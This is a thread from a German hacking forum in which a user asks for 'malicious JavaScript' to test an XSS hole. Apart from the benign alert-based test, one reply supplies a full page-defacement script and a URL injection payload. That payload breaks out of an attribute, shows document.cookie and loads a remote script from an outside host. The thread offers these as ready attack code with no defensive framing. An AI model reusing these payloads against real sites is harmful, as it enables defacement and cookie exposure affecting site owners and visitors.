Ergebnis 1 bis 7 von 7
  1. #1
    Bugbear Wurm
    Registriert seit
    08.09.2007
    Beiträge
    236

    Standard Schadhaftes Javascript

    Hey Leute,

    ich brauche einen kleinen JS Virus zum Testen von einem XSS.
    Wer hätte da eins ?

    Lieben Gruß
    [S] 6-stellige ICQ Nr. <3
    [B] Erste Schritte im "hacken"
    [B] iPhone jailbreak / unlock support
    [B] frag mich vllt kann ichs.

  2. #2
    Tsutomu Shimomura Avatar von -=Player=-
    Registriert seit
    15.02.2006
    Beiträge
    1.549

    Standard

    die frage ist jetzt nur, was du unter "schadhaft" oder "virus" verstehst.
    die meisten javascript schadcodes sind oft nur würmer, die sich auf der oder anderen homepages verbreiten. (die werden aber meistens speziell für einen angeriff geschrieben)
    also solltest du schon etwas genauer beschreiben was du willst.

    p.s. um eine xss zu testen brauch man kein Virus
    <script>alert(1337)</script>
    reicht auch aus

  3. #3
    ©(¶Óo¶) Avatar von kalachnikov
    Registriert seit
    12.07.2009
    Beiträge
    624

    Standard

    Was soll denn dein JS Virus anrichten?
    Bitte um detailiertes Anliegen.


    |____
    free-hack.com___|__\



  4. #4
    Bugbear Wurm
    Registriert seit
    08.09.2007
    Beiträge
    236

    Standard

    das mit dem alert hab ich schon gemacht ... ;-) das funktioniert ...

    genauere angaben kann ich leider nicht geben, weil ich nicht weiss wie sehr ich mit js irgendwas am browser usw. manipulieren kann...was ist denn möglich ?
    [S] 6-stellige ICQ Nr. <3
    [B] Erste Schritte im "hacken"
    [B] iPhone jailbreak / unlock support
    [B] frag mich vllt kann ichs.

  5. #5
    ©(¶Óo¶) Avatar von kalachnikov
    Registriert seit
    12.07.2009
    Beiträge
    624

    Standard

    du kannst mittels javascript eine page defacen, wenn du das meinst..
    hier das Javascript:
    Code:
    var title = "XSSED BY kalachnikov";var bgcolor = "#000000";var image_url = "suchs dir aus!";var text = "XSS By kalachnikov";var font_color = "#00FF00";deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {  document.title = pageTitle;  document.body.innerHTML = '';  document.bgColor = bgColor;  var overLay = document.createElement("div");  overLay.style.textAlign = 'center';  document.body.appendChild(overLay);  var txt = document.createElement("p");  txt.style.font = 'normal normal bold 30px Verdana';  txt.style.color = fontColor;  txt.innerHTML = pageText;  overLay.appendChild(txt);   if (image_url != "") {    var newImg = document.createElement("img");var centerImg = document.createElement("center");    newImg.setAttribute("border", '0');    newImg.setAttribute("src", imageUrl); centerImg.appendChild(newImg);   overLay.appendChild(centerImg);  }  var footer = document.createElement("p");  footer.style.font ='italic normal normal 12px Arial';  footer.style.color = '#333333'; footer.innerHTML = title;  overLay.appendChild(footer);}
    und das fügst du in die Url ein:
    Code:
    ">/kalachnikov/><script>alert(document.cookie)</script><script src=http://deinePage.de/style.js></script>
    damit kannst du eine page "manipulieren" jedoch nicht schädigen..


    |____
    free-hack.com___|__\



  6. #6
    Tsutomu Shimomura Avatar von -=Player=-
    Registriert seit
    15.02.2006
    Beiträge
    1.549

    Standard

    das mit dem deface ist nicht ganz richtig, der deface erscheint nur clientseitig und nicht server seitig.

  7. #7
    ©(¶Óo¶) Avatar von kalachnikov
    Registriert seit
    12.07.2009
    Beiträge
    624

    Standard

    ja, hast natürlich recht! habs vergessen zu erwähnen...


    |____
    free-hack.com___|__\



Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •